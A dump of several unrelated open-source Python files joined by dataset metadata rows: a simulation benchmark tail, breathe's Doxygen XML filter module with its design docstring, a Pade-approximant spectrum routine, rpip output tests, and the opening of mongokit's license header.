print("step {}, time = {:.2e}, verlet: {:.2f}, energy: {:.2e}"
.format(i, t, system.cell_system.get_state()["verlet_reuse"],
system.analysis.energy()["total"]))
all_t.append(t)
main_tock = time()
# average time
all_t = np.array(all_t)
avg = np.average(all_t)
ci = 1.96 * np.std(all_t) / np.sqrt(len(all_t) - 1)
print("average: {:.3e} +/- {:.3e} (95% C.I.)".format(avg, ci))
cmd = " ".join(x for x in sys.argv[1:] if not x.startswith("--output"))
report = ('"{script}","{arguments}",{cores},{mean:.3e},'
'{ci:.3e},{n},{dur:.1f}\n'.format(
script=os.path.basename(sys.argv[0]), arguments=cmd,
cores=n_proc, dur=main_tock - main_tick, n=measurement_steps,
mean=avg, ci=ci))
if not os.path.isfile(args.output):
report = ('"script","arguments","cores","mean","ci",'
'"nsteps","duration"\n' + report)
with open(args.output, "a") as f:
f.write(report)
| gpl-3.0 | -8,576,075,647,164,855,000 | 34.808743 | 78 | 0.581566 | false |
frontg8/frontg8lib | doc/ext/breathe/breathe/renderer/filter.py | 1 | 37770 | """
Filters
-------
Filters are an interesting and somewhat challenging part of the code base. They are used for
two different purposes:
- To figure out which nodes in the xml hierarchy to start rendering from. These are called
'finder filters' or 'content filters'. This is done before rendering starts.
- To figure out which nodes under a selected nodes in the xml hierarchy should be rendered. These
are called 'render filters'. This is done during the render process with a test in the
DoxygenToRstRendererFactory.
General Implementation
~~~~~~~~~~~~~~~~~~~~~~
Filters are essentially just tests to see if a node matches certain parameters that are needed to
decide whether or not to include it in some output.
As these filters are declared once and then used on multiple nodes, we model them as object
hierarchies that encapsulate the required test and take a node (with its context) and return True or
False.
If you wanted a test which figures out if a node has the node_type 'memberdef' you might create the
following object hierarchy:
node_is_memberdef = InFilter(AttributeAccessor(Node(), 'node_type'), ['memberdef'])
This reads from the inside out: get the node, then get the node_type attribute from it, and see
if the value of the attribute is in the list ['memberdef'].
The Node() is called a 'Selector'. Parent() is also a selector. It means given the current context,
work with the parent of the current node rather than the node itself. This allows you to frame tests
in terms of a node's parent as well as the node which helps when we want nodes with particular
parents and not others.
The AttributeAccessor() is called an 'Accessor'. It wraps up an attempt to access a particular
attribute on the selected node. There are quite a few different specific accessors but they can
mostly be generalised with the AttributeAccessor. This code has evolved over time and initially the
implementation involved specific accessor classes (which are still used in large parts of it.)
The InFilter() is unsurprisingly called a 'Filter'. There are lots of different filters. Filters
either act on the results of Accessors or on the results of other Filters and they always return
True or False. The AndFilter and the OrFilter can be used to combine the outputs of other Filters
with logical 'and' and 'or' operations.
You can build up some pretty complex expressions with this level of freedom as you
might imagine. The complexity is unfortunate but necessary as the nature of filtering the xml is
quite complex.
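For example, a hypothetical evaluation of such a filter might look like this (node_stack is the
stack of xml nodes currently being visited, with the current node first and its ancestors after it):
    node_is_memberdef = InFilter(AttributeAccessor(Node(), 'node_type'), ['memberdef'])
    # True only if node_stack[0].node_type == 'memberdef'
    node_is_memberdef.allow(node_stack)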
Finder Filters
~~~~~~~~~~~~~~
The implementation of the filters can change a little depending on how they are called. Finder
filters are called from the breathe.finder.doxygen.index and breathe.finder.doxygen.compound files.
They are called like this:
# Descend down the hierarchy
# ...
if filter_.allow(node_stack):
matches.append(self.data_object)
# Keep on descending
# ...
This means that the result of the filter does not stop us descending down the hierarchy and testing
more nodes. This simplifies the filters as they only have to return true for the exact nodes they
are interested in and they don't have to worry about allowing the iteration down the hierarchy to
continue for nodes which don't match.
An example of a finder filter is:
AndFilter(
InFilter(NodeTypeAccessor(Node()), ["compound"]),
InFilter(KindAccessor(Node()), ["group"]),
InFilter(NameAccessor(Node()), ["mygroup"])
)
This says, return True for all the nodes of node_type 'compound' with 'kind' set to 'group' which
have the name 'mygroup'. It returns false for everything else, but when a node matching this is
found then it is added to the matches list by the code above.
It is therefore relatively easy to write finder filters. If you have two separate node filters like
the one above and you want to match nodes which satisfy either of them then you can do:
OrFilter(
node_filter_1,
node_filter_2
)
To combine them.
Content Filters
~~~~~~~~~~~~~~~
Content filters are harder than the finder filters as they are responsible for halting the iteration
down the hierarchy if they return false. This means that if you're interested in memberdef nodes
with a particular attribute then you have to check for that but also include a clause which allows
all other non-memberdef nodes to pass through as you don't want to interrupt them.
This means you end up with filters like this:
OrFilter(
AndFilter(
InFilter(NodeTypeAccessor(Node()), ["compound"]),
InFilter(KindAccessor(Node()), ["group"]),
InFilter(NameAccessor(Node()), ["mygroup"])
),
NotFilter(
AndFilter(
InFilter(NodeTypeAccessor(Node()), ["compound"]),
InFilter(KindAccessor(Node()), ["group"]),
)
)
)
Which is to say that we want to let through a compound, with kind group, with name 'mygroup' but
we're also happy if the node is **not** a compound with kind group. Really we just don't want to let
through any compounds with kind group with name other than 'mygroup'. As such, we can rephrase this
as:
NotFilter(
AndFilter(
InFilter(NodeTypeAccessor(Node()), ["compound"]),
InFilter(KindAccessor(Node()), ["group"]),
NotFilter(InFilter(NameAccessor(Node()), ["mygroup"]))
)
)
Using logical manipulation we can rewrite this as:
OrFilter(
NotFilter(InFilter(NodeTypeAccessor(Node()), ["compound"])),
NotFilter(InFilter(KindAccessor(Node()), ["group"])),
InFilter(NameAccessor(Node()), ["mygroup"])
)
This reads: allow it if it isn't a compound; or if it is a compound but doesn't have a 'kind' of
'group'; but if it is a compound and has a 'kind' of 'group', then only allow it if it is named 'mygroup'.
Helper Syntax
~~~~~~~~~~~~~
Some of these filter declarations get a little awkward to read and write. They are not laid out in
a manner which reads smoothly. Additional helper methods and operator overloads have been introduced
to help with this.
AttributeAccessor objects are created in property methods on the Selector classes so:
node.kind
Where node has been declared as a Node() instance. Results in:
AttributeAccessor(Node(), 'kind')
The '==' and '!=' operators on the Accessors have been overloaded to return the appropriate filters
so that:
node.kind == 'group'
Results in:
    InFilter(AttributeAccessor(Node(), 'kind'), ['group'])
We also override the bitwise 'and' (&), 'or' (|) and 'not' (~) operators in Python to apply
AndFilters, OrFilters and NotFilters respectively. We have to override the bitwise operators as the
actual 'and', 'or' and 'not' keywords cannot be overridden. So:
(node.node_type == 'compound') & (node.name == 'mygroup')
Translates to:
AndFilter(
        InFilter(NodeTypeAccessor(Node()), ["compound"]),
InFilter(NameAccessor(Node()), ["mygroup"])
)
Where the former is hopefully more readable without sacrificing too much to the abstract magic of
operator overloads.
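Likewise, a hypothetical negation written with the '~' overload:
    ~ (node.node_type == 'memberdef')
Translates to:
    NotFilter(InFilter(NodeTypeAccessor(Node()), ["memberdef"]))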
Operator Precedences & Extra Parenthesis
''''''''''''''''''''''''''''''''''''''''
As the bitwise operators bind more tightly than '==' and '!=' (and the comparison operators chain),
we have to include additional parentheses in the expressions to group them as we want. So instead of
writing:
node.node_type == 'compound' & node.name == 'mygroup'
We have to write:
(node.node_type == 'compound') & (node.name == 'mygroup')
"""
import six
class UnrecognisedKindError(Exception):
pass
class Selector(object):
@property
def node_type(self):
return NodeTypeAccessor(self)
@property
def kind(self):
return AttributeAccessor(self, 'kind')
@property
def node_name(self):
return AttributeAccessor(self, 'node_name')
@property
def name(self):
return AttributeAccessor(self, 'name')
@property
def briefdescription(self):
return AttributeAccessor(self, 'briefdescription')
@property
def detaileddescription(self):
return AttributeAccessor(self, 'detaileddescription')
@property
def prot(self):
return AttributeAccessor(self, 'prot')
@property
def valueOf(self):
return AttributeAccessor(self, 'valueOf_')
@property
def id(self):
return AttributeAccessor(self, 'id')
class Ancestor(Selector):
def __init__(self, generations):
self.generations = generations
def __call__(self, node_stack):
return node_stack[self.generations]
class Parent(Selector):
def __call__(self, node_stack):
return node_stack[1]
class Node(Selector):
def __call__(self, node_stack):
return node_stack[0]
class Accessor(object):
def __init__(self, selector):
self.selector = selector
def __eq__(self, value):
return InFilter(self, [value])
def __ne__(self, value):
return NotFilter(InFilter(self, [value]))
def is_one_of(self, collection):
return InFilter(self, collection)
def has_content(self):
return HasContentFilter(self)
def endswith(self, options):
return EndsWithFilter(self, options)
class NameAccessor(Accessor):
def __call__(self, node_stack):
return self.selector(node_stack).name
class NodeNameAccessor(Accessor):
"""Check the .node_name member which is declared on refTypeSub nodes
It distinguishes between innerclass, innernamespace, etc.
"""
def __call__(self, node_stack):
return self.selector(node_stack).node_name
class NodeTypeAccessor(Accessor):
def __call__(self, node_stack):
data_object = self.selector(node_stack)
try:
return data_object.node_type
except AttributeError as e:
# Horrible hack to silence errors on filtering unicode objects
# until we fix the parsing
if type(data_object) == six.text_type:
return "unicode"
else:
raise e
class KindAccessor(Accessor):
def __call__(self, node_stack):
return self.selector(node_stack).kind
class AttributeAccessor(Accessor):
"""Returns the value of a particular attribute on the selected node.
AttributeAccessor(Node(), 'name') returns the value of ``node.name``.
"""
def __init__(self, selector, attribute_name):
Accessor.__init__(self, selector)
self.attribute_name = attribute_name
def __call__(self, node_stack):
return getattr(self.selector(node_stack), self.attribute_name)
class LambdaAccessor(Accessor):
def __init__(self, selector, func):
Accessor.__init__(self, selector)
self.func = func
def __call__(self, node_stack):
return self.func(self.selector(node_stack))
class NamespaceAccessor(Accessor):
def __call__(self, node_stack):
return self.selector(node_stack).namespaces
class Filter(object):
def __and__(self, other):
return AndFilter(self, other)
def __or__(self, other):
return OrFilter(self, other)
def __invert__(self):
return NotFilter(self)
class HasAncestorFilter(Filter):
def __init__(self, generations):
self.generations = generations
def allow(self, node_stack):
return len(node_stack) > self.generations
class HasContentFilter(Filter):
def __init__(self, accessor):
self.accessor = accessor
def allow(self, node_stack):
"""Detects if the node in questions has an empty .content_ property.
"""
return bool(self.accessor(node_stack).content_)
class EndsWithFilter(Filter):
"""Detects if the string result of the accessor ends with any of the strings in the ``options``
iterable parameter.
"""
def __init__(self, accessor, options):
self.accessor = accessor
self.options = options
def allow(self, node_stack):
string = self.accessor(node_stack)
for entry in self.options:
if string.endswith(entry):
return True
return False
class InFilter(Filter):
"""Checks if what is returned from the accessor is 'in' in the members"""
def __init__(self, accessor, members):
self.accessor = accessor
self.members = members
def allow(self, node_stack):
name = self.accessor(node_stack)
return name in self.members
class GlobFilter(Filter):
def __init__(self, accessor, glob):
self.accessor = accessor
self.glob = glob
def allow(self, node_stack):
text = self.accessor(node_stack)
return self.glob.match(text)
class FilePathFilter(Filter):
def __init__(self, accessor, target_file, path_handler):
self.accessor = accessor
self.target_file = target_file
self.path_handler = path_handler
def allow(self, node_stack):
location = self.accessor(node_stack).file
if self.path_handler.includes_directory(self.target_file):
# If the target_file contains directory separators then
# match against the same length at the end of the location
#
location_match = location[-len(self.target_file):]
return location_match == self.target_file
else:
# If there are no separators, match against the whole filename
# at the end of the location
#
# This is to prevent "Util.cpp" matching "PathUtil.cpp"
#
location_basename = self.path_handler.basename(location)
return location_basename == self.target_file
class NamespaceFilter(Filter):
def __init__(self, namespace_accessor, name_accessor):
self.namespace_accessor = namespace_accessor
self.name_accessor = name_accessor
def allow(self, node_stack):
namespaces = self.namespace_accessor(node_stack)
name = self.name_accessor(node_stack)
try:
namespace, name = name.rsplit("::", 1)
except ValueError:
namespace, name = "", name
return namespace in namespaces
class OpenFilter(Filter):
def allow(self, node_stack):
return True
class ClosedFilter(Filter):
def allow(self, node_stack):
return False
class NotFilter(Filter):
def __init__(self, child_filter):
self.child_filter = child_filter
def allow(self, node_stack):
return not self.child_filter.allow(node_stack)
class AndFilter(Filter):
def __init__(self, *filters):
self.filters = filters
def allow(self, node_stack):
# If any filter returns False then return False
for filter_ in self.filters:
if not filter_.allow(node_stack):
return False
return True
class OrFilter(Filter):
"""Provides a short-cutted 'or' operation between two filters"""
def __init__(self, *filters):
self.filters = filters
def allow(self, node_stack):
# If any filter returns True then return True
for filter_ in self.filters:
if filter_.allow(node_stack):
return True
return False
class IfFilter(Filter):
def __init__(self, condition, if_true, if_false):
self.condition = condition
self.if_true = if_true
self.if_false = if_false
def allow(self, node_stack):
if self.condition.allow(node_stack):
return self.if_true.allow(node_stack)
else:
return self.if_false.allow(node_stack)
class Glob(object):
def __init__(self, method, pattern):
self.method = method
self.pattern = pattern
def match(self, name):
return self.method(name, self.pattern)
class Gather(object):
def __init__(self, accessor, names):
self.accessor = accessor
self.names = names
def allow(self, node_stack):
self.names.extend(self.accessor(node_stack))
return False
class FilterFactory(object):
# C++ style public entries
public_kinds = set([
"public-type",
"public-func",
"public-attrib",
"public-slot",
"public-static-func",
"public-static-attrib",
])
def __init__(self, path_handler):
self.path_handler = path_handler
self.default_members = ()
self.implementation_filename_extensions = ()
def create_render_filter(self, kind, options):
"""Render filter for group & namespace blocks"""
if kind not in ['group', 'namespace']:
raise UnrecognisedKindError(kind)
# Generate new dictionary from defaults
filter_options = dict((entry, u'') for entry in self.default_members)
# Update from the actual options
filter_options.update(options)
# Convert the doxygengroup members flag (which just stores None as the value) to an empty
# string to allow the create_class_member_filter to process it properly
if 'members' in filter_options:
filter_options['members'] = u''
node = Node()
grandparent = Ancestor(2)
has_grandparent = HasAncestorFilter(2)
non_class_memberdef = \
has_grandparent \
& (grandparent.node_type == 'compounddef') \
& (grandparent.kind != 'class') \
& (grandparent.kind != 'struct') \
& (node.node_type == 'memberdef')
return (self.create_class_member_filter(filter_options) | non_class_memberdef) \
& self.create_innerclass_filter(filter_options) \
& self.create_outline_filter(filter_options)
def create_class_filter(self, target, options):
"""Content filter for classes based on various directive options"""
# Generate new dictionary from defaults
filter_options = dict((entry, u'') for entry in self.default_members)
# Update from the actual options
filter_options.update(options)
return AndFilter(
self.create_class_member_filter(filter_options),
self.create_innerclass_filter(filter_options, outerclass=target),
self.create_outline_filter(filter_options),
self.create_show_filter(filter_options),
)
def create_innerclass_filter(self, options, outerclass=''):
"""
        :param outerclass: Should be the class/struct being targeted by the directive calling this
code. If it is a group or namespace directive then it should be left
blank. It is used when looking for names listed in the :members: option.
The name should include any additional namespaces that the target class
is in.
"""
node = Node()
node_is_innerclass = (node.node_type == "ref") & (node.node_name == "innerclass")
parent = Parent()
parent_is_compounddef = parent.node_type == 'compounddef'
parent_is_class = parent.kind.is_one_of(['class', 'struct'])
allowed = set()
all_options = {
'protected-members': 'protected',
'private-members': 'private',
}
for option, scope in all_options.iteritems():
if option in options:
allowed.add(scope)
node_is_innerclass_in_class = parent_is_compounddef & parent_is_class & node_is_innerclass
public_innerclass_filter = ClosedFilter()
if 'members' in options:
if options['members'].strip():
text = options["members"]
prefix = ('%s::' % outerclass) if outerclass else ''
# Matches sphinx-autodoc behaviour of comma separated values
members = set(['%s%s' % (prefix, x.strip()) for x in text.split(",")])
node_valueOf_is_in_members = node.valueOf.is_one_of(members)
                # Accept any nodes which aren't innerclass entries of a class/struct or, if
                # they are, only accept them if their names are in the members list
public_innerclass_filter = ~node_is_innerclass_in_class | node_valueOf_is_in_members
else:
allowed.add('public')
node_is_in_allowed_scope = node.prot.is_one_of(allowed)
innerclass = ~ node_is_innerclass_in_class | node_is_in_allowed_scope
description = self._create_description_filter(True, 'compounddef', options)
        # Put the parent check last as we only want to check parents of innerclasses; otherwise
        # we have to check the parent's type as well
return innerclass | public_innerclass_filter | description
def create_show_filter(self, options):
"""Currently only handles the header-file entry"""
try:
text = options["show"]
except KeyError:
# Allow through everything except the header-file includes nodes
return OrFilter(
NotFilter(InFilter(NodeTypeAccessor(Parent()), ["compounddef"])),
NotFilter(InFilter(NodeTypeAccessor(Node()), ["inc"]))
)
if text == "header-file":
# Allow through everything, including header-file includes
return OpenFilter()
# Allow through everything except the header-file includes nodes
return OrFilter(
NotFilter(InFilter(NodeTypeAccessor(Parent()), ["compounddef"])),
NotFilter(InFilter(NodeTypeAccessor(Node()), ["inc"]))
)
def _create_description_filter(self, allow, level, options):
"""Whether or not we allow descriptions is determined by the calling function and we just do
whatever the 'allow' function parameter tells us.
"""
node = Node()
node_is_description = node.node_type == 'description'
parent = Parent()
parent_is_level = parent.node_type == level
        # Nothing with a parent at the given level
description_filter = ~ parent_is_level
        # Let through any description children of the given level if we output any kind of members
if allow:
description_filter = \
(parent_is_level & node_is_description) | ~ parent_is_level
return description_filter
def _create_public_members_filter(self, options):
node = Node()
node_is_memberdef = node.node_type == "memberdef"
node_is_public = node.prot == "public"
parent = Parent()
parent_is_sectiondef = parent.node_type == "sectiondef"
# Nothing with a parent that's a sectiondef
is_memberdef = parent_is_sectiondef & node_is_memberdef
public_members_filter = ~ is_memberdef
# If the user has specified the 'members' option with arguments then we only pay attention
# to that and not to any other member settings
if "members" in options:
if options['members'].strip():
text = options["members"]
# Matches sphinx-autodoc behaviour of comma separated values
members = set([x.strip() for x in text.split(",")])
node_name_is_in_members = node.name.is_one_of(members)
# Accept any nodes which don't have a "sectiondef" as a parent or, if they do, only
# accept them if their names are in the members list
public_members_filter = \
(parent_is_sectiondef & node_name_is_in_members) | ~ parent_is_sectiondef
else:
# Select anything that doesn't have a parent which is a sectiondef, or, if it does,
# only select the public ones
public_members_filter = \
(is_memberdef & node_is_public) | ~ is_memberdef
return public_members_filter
def _create_non_public_members_filter(self, prot, option_name, options):
"""'prot' is the doxygen xml term for 'public', 'protected' and 'private' categories."""
node = Node()
node_is_memberdef = node.node_type == "memberdef"
node_is_public = node.prot == prot
parent = Parent()
parent_is_sectiondef = parent.node_type == "sectiondef"
# Nothing with a parent that's a sectiondef
is_memberdef = parent_is_sectiondef & node_is_memberdef
filter_ = ~ is_memberdef
if option_name in options:
            # Allow anything that isn't a memberdef, or if it is, only allow the ones
            # matching the given protection level
filter_ = ~ is_memberdef | node_is_public
return filter_
def _create_undoc_members_filter(self, options):
node = Node()
node_is_memberdef = node.node_type == 'memberdef'
node_has_description = node.briefdescription.has_content() \
| node.detaileddescription.has_content()
# Allow anything that isn't a memberdef, or if it is only allow the ones with a description
undoc_members_filter = ~ node_is_memberdef | node_has_description
if 'undoc-members' in options:
undoc_members_filter = OpenFilter()
return undoc_members_filter
def create_class_member_filter(self, options):
"""Content filter based on :members: and :private-members: classes"""
# I can't fully explain the filtering of descriptions here. More testing needed to figure
# out when it is needed. This approach reflects the old code that was here but it wasn't
# commented (my fault.) I wonder if maybe the public and private declarations themselves can
# be documented and we need to let them through. Not sure.
allow = 'members' in options \
or 'protected-members' in options \
or 'private-members' in options
description = self._create_description_filter(allow, 'sectiondef', options)
# Create all necessary filters and combine them
public_members = self._create_public_members_filter(options)
protected_members = self._create_non_public_members_filter(
'protected',
'protected-members',
options
)
private_members = self._create_non_public_members_filter(
'private',
'private-members',
options
)
undoc_members = self._create_undoc_members_filter(options)
# Allow any public/private members which also fit the undoc filter and all the descriptions
allowed_members = (public_members | protected_members | private_members) & undoc_members
return allowed_members | description
def create_outline_filter(self, options):
if 'outline' in options:
node = Node()
return ~ node.node_type.is_one_of(["description", "inc"])
else:
return OpenFilter()
def create_file_filter(self, filename, options):
valid_names = []
filter_ = AndFilter(
NotFilter(
# Gather the "namespaces" attribute from the
# compounddef for the file we're rendering and
# store the information in the "valid_names" list
#
# Gather always returns false, so, combined with
# the NotFilter this chunk always returns true and
# so does not affect the result of the filtering
AndFilter(
InFilter(NodeTypeAccessor(Node()), ["compounddef"]),
InFilter(KindAccessor(Node()), ["file"]),
FilePathFilter(
LambdaAccessor(Node(), lambda x: x.location),
filename, self.path_handler
),
Gather(LambdaAccessor(Node(), lambda x: x.namespaces), valid_names)
)
),
NotFilter(
                # Take the valid_names and every time we handle an
# innerclass or innernamespace, check that its name
# was one of those initial valid names so that we
# never end up rendering a namespace or class that
# wasn't in the initial file. Notably this is
# required as the location attribute for the
# namespace in the xml is unreliable.
AndFilter(
InFilter(NodeTypeAccessor(Parent()), ["compounddef"]),
InFilter(NodeTypeAccessor(Node()), ["ref"]),
InFilter(NodeNameAccessor(Node()), ["innerclass", "innernamespace"]),
NotFilter(
InFilter(
LambdaAccessor(Node(), lambda x: x.content_[0].getValue()),
valid_names
)
)
)
),
NotFilter(
# Ignore innerclasses and innernamespaces that are inside a
# namespace that is going to be rendered as they will be
# rendered with that namespace and we don't want them twice
AndFilter(
InFilter(NodeTypeAccessor(Parent()), ["compounddef"]),
InFilter(NodeTypeAccessor(Node()), ["ref"]),
InFilter(NodeNameAccessor(Node()), ["innerclass", "innernamespace"]),
NamespaceFilter(
NamespaceAccessor(Parent()),
LambdaAccessor(Node(), lambda x: x.content_[0].getValue())
)
)
),
NotFilter(
# Ignore memberdefs from files which are different to
# the one we're rendering. This happens when we have to
# cross into a namespace xml file which has entries
# from multiple files in it
AndFilter(
InFilter(NodeTypeAccessor(Node()), ["memberdef"]),
NotFilter(
FilePathFilter(LambdaAccessor(Node(), lambda x: x.location),
filename, self.path_handler)
)
)
),
NotFilter(
# Ignore compounddefs which are from another file
# (normally means classes and structs which are in a
# namespace that we have other interests in) but only
# check it if the compounddef is not a namespace
# itself, as for some reason compounddefs for
# namespaces are registered with just a single file
                # location even if the namespace is spread over
# multiple files
AndFilter(
InFilter(NodeTypeAccessor(Node()), ["compounddef"]),
NotFilter(InFilter(KindAccessor(Node()), ["namespace"])),
NotFilter(
FilePathFilter(LambdaAccessor(Node(), lambda x: x.location),
filename, self.path_handler)
)
)
)
)
return AndFilter(
self.create_outline_filter(options),
filter_
)
def create_content_filter(self, kind, options):
"""Returns a filter which matches the contents of the or namespace but not the group or
namepace name or description.
This allows the groups to be used to structure sections of the documentation rather than to
structure and further document groups of documentation
As a finder/content filter we only need to match exactly what we're interested in.
"""
if kind not in ['group', 'namespace']:
raise UnrecognisedKindError(kind)
node = Node()
# Filter for public memberdefs
node_is_memberdef = node.node_type == 'memberdef'
node_is_public = node.prot == 'public'
public_members = node_is_memberdef & node_is_public
# Filter for public innerclasses
parent = Parent()
parent_is_compounddef = parent.node_type == 'compounddef'
parent_is_class = parent.kind == kind
node_is_innerclass = (node.node_type == "ref") & (node.node_name == "innerclass")
public_innerclass = parent_is_compounddef & parent_is_class \
& node_is_innerclass & node_is_public
return public_members | public_innerclass
def create_index_filter(self, options):
filter_ = AndFilter(
NotFilter(
AndFilter(
InFilter(NodeTypeAccessor(Parent()), ["compounddef"]),
InFilter(NodeTypeAccessor(Node()), ["ref"]),
InFilter(NodeNameAccessor(Node()), ["innerclass", "innernamespace"])
)
),
NotFilter(
AndFilter(
InFilter(NodeTypeAccessor(Parent()), ["compounddef"]),
InFilter(KindAccessor(Parent()), ["group"]),
InFilter(NodeTypeAccessor(Node()), ["sectiondef"]),
InFilter(KindAccessor(Node()), ["func"])
)
)
)
return AndFilter(
self.create_outline_filter(options),
filter_
)
def create_open_filter(self):
"""Returns a completely open filter which matches everything"""
return OpenFilter()
def create_id_filter(self, node_type, refid):
node = Node()
return (node.node_type == node_type) & (node.id == refid)
def create_file_finder_filter(self, filename):
filter_ = AndFilter(
InFilter(NodeTypeAccessor(Node()), ["compounddef"]),
InFilter(KindAccessor(Node()), ["file"]),
FilePathFilter(LambdaAccessor(Node(), lambda x: x.location), filename,
self.path_handler)
)
return filter_
def create_member_finder_filter(self, namespace, name, kind):
"""Returns a filter which looks for a member with the specified name and kind."""
node = Node()
parent = Parent()
node_matches = (node.node_type == 'member') \
& (node.kind == kind) \
& (node.name == name)
if namespace:
parent_matches = (parent.node_type == 'compound') \
& ((parent.kind == 'namespace') | (parent.kind == 'class')) \
& (parent.name == namespace)
return parent_matches & node_matches
else:
is_implementation_file = parent.name.endswith(self.implementation_filename_extensions)
parent_is_compound = parent.node_type == 'compound'
parent_is_file = (parent.kind == 'file') & (~ is_implementation_file)
parent_is_not_file = parent.kind != 'file'
return (parent_is_compound & parent_is_file & node_matches) \
| (parent_is_compound & parent_is_not_file & node_matches)
def create_function_finder_filter(self, namespace, name):
parent = Parent()
parent_is_compound = parent.node_type == 'compound'
parent_is_group = parent.kind == 'group'
function_filter = self.create_member_finder_filter(namespace, name, 'function')
# Get matching functions but only ones where the parent is not a group. We want to skip
# function entries in groups as we'll find the same functions in a file's xml output
# elsewhere and having more than one match is confusing for our logic later on.
return function_filter & ~(parent_is_compound & parent_is_group)
def create_enumvalue_finder_filter(self, name):
"""Returns a filter which looks for an enumvalue with the specified name."""
node = Node()
return (node.node_type == 'enumvalue') & (node.name == name)
def create_compound_finder_filter(self, name, kind):
"""Returns a filter which looks for a compound with the specified name and kind."""
node = Node()
return (node.node_type == 'compound') & (node.kind == kind) & (node.name == name)
def create_finder_filter(self, kind, name):
"""Returns a filter which looks for the compound node from the index which is a group node
(kind=group) and has the appropriate name
The compound node should reference the group file which we can parse for the group
contents.
"""
if kind == 'group':
filter_ = AndFilter(
InFilter(NodeTypeAccessor(Node()), ["compound"]),
InFilter(KindAccessor(Node()), ["group"]),
InFilter(NameAccessor(Node()), [name])
)
else:
# Assume kind == 'namespace'
filter_ = AndFilter(
InFilter(NodeTypeAccessor(Node()), ["compound"]),
InFilter(KindAccessor(Node()), ["namespace"]),
InFilter(NameAccessor(Node()), [name])
)
return filter_
def get_config_values(self, app):
"""Extract the breathe_default_members config value and store it.
This method is called on the 'builder-init' event in Sphinx"""
self.default_members = app.config.breathe_default_members
self.implementation_filename_extensions = \
app.config.breathe_implementation_filename_extensions
| bsd-3-clause | -4,144,635,030,783,446,500 | 32.336275 | 100 | 0.610988 | false |
jjgoings/McMurchie-Davidson | mmd/utils/spectrum.py | 1 | 3029 | from __future__ import division
import numpy as np
"""Contains some routines to do the (Pade approximant) Fourier transform
as well as some peak-finding routines, useful for post processing a
real-time calculation
"""
def genSpectra(time,dipole,signal):
fw, frequency = pade(time,dipole)
fw_sig, frequency = pade(time,signal)
numerator = np.imag(fw)
denominator = np.abs(fw_sig)
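    # prefactor constants: 27.21138602 is the Hartree-to-eV conversion and 137.036 is the speed
    # of light in atomic units (this reading of the constants is an assumption, not stated above)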
spectra = ((4.0*27.21138602*2*frequency*np.pi*(numerator))/(3.0*137.036*denominator))
return frequency, spectra
def pade(time,dipole):
damp_const = 50.0
dipole = np.asarray(dipole) - dipole[0]
stepsize = time[1] - time[0]
damp = np.exp(-(stepsize*np.arange(len(dipole)))/float(damp_const))
dipole *= damp
M = len(dipole)
N = int(np.floor(M / 2))
num_pts = 20000
if N > num_pts:
N = num_pts
# G and d are (N-1) x (N-1)
# d[k] = -dipole[N+k] for k in range(1,N)
d = -dipole[N+1:2*N]
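    # Pade idea: model the damped dipole signal's z-transform as a rational function p(z)/q(z);
    # the denominator coefficients b solve the Toeplitz system G b = d built from the samples,
    # and the numerator coefficients a then follow from b via the triangular convolution below.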
try:
from scipy.linalg import toeplitz, solve_toeplitz
except ImportError:
print("You'll need SciPy version >= 0.17.0")
try:
# Instead, form G = (c,r) as toeplitz
#c = dipole[N:2*N-1]
#r = np.hstack((dipole[1],dipole[N-1:1:-1]))
b = solve_toeplitz((dipole[N:2*N-1],\
np.hstack((dipole[1],dipole[N-1:1:-1]))),d,check_finite=False)
except np.linalg.linalg.LinAlgError:
# OLD CODE: sometimes more stable
# G[k,m] = dipole[N - m + k] for m,k in range(1,N)
G = dipole[N + np.arange(1,N)[:,None] - np.arange(1,N)]
b = np.linalg.solve(G,d)
# Now make b Nx1 where b0 = 1
b = np.hstack((1,b))
# b[m]*dipole[k-m] for k in range(0,N), for m in range(k)
a = np.dot(np.tril(toeplitz(dipole[0:N])),b)
p = np.poly1d(a)
q = np.poly1d(b)
# If you want energies greater than 2*27.2114 eV, you'll need to change
# the default frequency range to something greater.
frequency = np.arange(0.00,2.0,0.0001)
W = np.exp(-1j*frequency*stepsize)
fw = p(W)/q(W)
return fw, frequency
def peaks(spectra,frequency,number=3,thresh=0.01):
""" Return the peaks from the Fourier transform
Variables:
number: integer. number of peaks to print.
    thresh: float. Threshold intensity for printing.
Returns: Energy (eV), Intensity (depends on type of spectra)
"""
from scipy.signal import argrelextrema as pks
# find all peak indices [idx], and remove those below thresh [jdx]
idx = pks(np.abs(spectra),np.greater,order=3)
jdx = np.where((np.abs(spectra[idx]) >= thresh))
kdx = idx[0][jdx[0]] # indices of peaks matching criteria
if number > len(kdx):
number = len(kdx)
print("First "+str(number)+" peaks (eV) found: ")
for i in xrange(number):
print("{0:.4f}".format(frequency[kdx][i]*27.2114),
"{0:.4f}".format(spectra[kdx][i]))
| bsd-3-clause | -264,727,656,188,925,760 | 29.908163 | 89 | 0.584021 | false |
danielfrg/remote-pip | rpip/tests/test_output.py | 1 | 1204 | from rpip.output import Output
exit0 = {'exit_code': 0, 'stdout': 'yes', 'stderr': ''}
exit1 = {'exit_code': 1, 'stdout': '', 'stderr': 'ERROR'}
o0 = {'host1': exit0, 'host2': exit0, 'host3': exit0}
o1 = {'host1': exit0, 'host2': exit1, 'host3': exit0}
o2 = {'host1': exit0, 'host2': exit1, 'host3': exit1}
def test_groupby():
o = Output(o0)
groups = o.groupby()
assert len(groups) == 1
nodes, output = groups[0]
assert len(nodes) == 3
assert nodes == ['host3', 'host2', 'host1']
assert output == exit0
def test_groupby2():
o = Output(o1)
groups = o.groupby()
assert len(groups) == 2
nodes, output = groups[0]
assert len(nodes) == 2
assert nodes == ['host3', 'host1']
assert output == exit0
nodes, output = groups[1]
assert len(nodes) == 1
assert nodes == ['host2']
assert output == exit1
def test_groupby3():
o = Output(o2)
groups = o.groupby()
assert len(groups) == 2
nodes, output = groups[0]
assert len(nodes) == 2
assert nodes == ['host3', 'host2']
assert output == exit1
nodes, output = groups[1]
assert len(nodes) == 1
assert nodes == ['host1']
assert output == exit0
| apache-2.0 | 3,832,086,671,021,986,300 | 22.607843 | 57 | 0.575581 | false |
namlook/mongokit | mongokit/schema_document.py | 1 | 42677 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2009-2011, Nicolas Clairon
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the University of California, Berkeley nor the
